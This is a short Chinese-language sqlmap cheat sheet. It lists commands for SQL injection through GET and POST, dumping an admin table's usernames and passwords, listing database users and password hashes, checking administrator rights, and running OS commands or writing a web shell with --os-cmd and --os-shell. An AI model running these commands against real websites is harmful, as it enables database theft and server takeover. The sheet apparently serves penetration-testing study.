GET注入
sqlmap.py -u "url" 检测存在不存在注入
sqlmap.py -u "url" --tables 列出数据库的表
sqlmap.py -u "url" --columns -T admin 列出admin的内容
sqlmap.py -u "url" --dump -T admin "useradmin,password" 列出useradmin password的内容
POST注入
sqlmap.py -u "www.xxx.com/index.php" --data "user=1&pass=1" --dbs 指定post参数注入出数据库
sqlmap.py -u "www.xxx.com/index.php" --forms sqlmap自动查找网页上的表单,并注入
sqlmap.py -r 1.txt -p user 用burp抓包,保存为1.txt 然后用-r参数注入,用-p参数来指定网页上的参数
查看权限写shell
sqlmap.py -u "url" --user 列出数据库的所以用户
sqlmap.py -u "url" --passwords 列出数据库用户的密码
sqlmap.py -u "url" --current-db 查看当前使用网站数据库的名字
sqlmap.py -u "url" --current-user 查看当前网站数据库的用户名称
sqlmap.py -u "url" --is-dba 查看当前用户是否是管理员权限 True代表有,如果没有的话就是False
如果,你验证了,是dba权限,那么就可以执行下面的命令了。
在数据库为mysql、postgresql、sql server时可以用 sqlmap.py -u "url" --os-cmd 来模拟一个cmd命令,然后执行一些命令,比如 sqlmap.py -u "url" --os-cmd=ipconfig 来获得ip。
sqlmap.py -u "url" --os-shell 写入一个shell,这里默认是php,如果是别的要自己选择。
其他参数
#sqlmap -techenique 参数
B:布尔型注入
E:报错型注入
U:可联合查询注入
S:可多语句查询注入
T:基于时间延迟注入
--dbms=”mysql”指定 mysql 数据库
--level=x x是要指定的数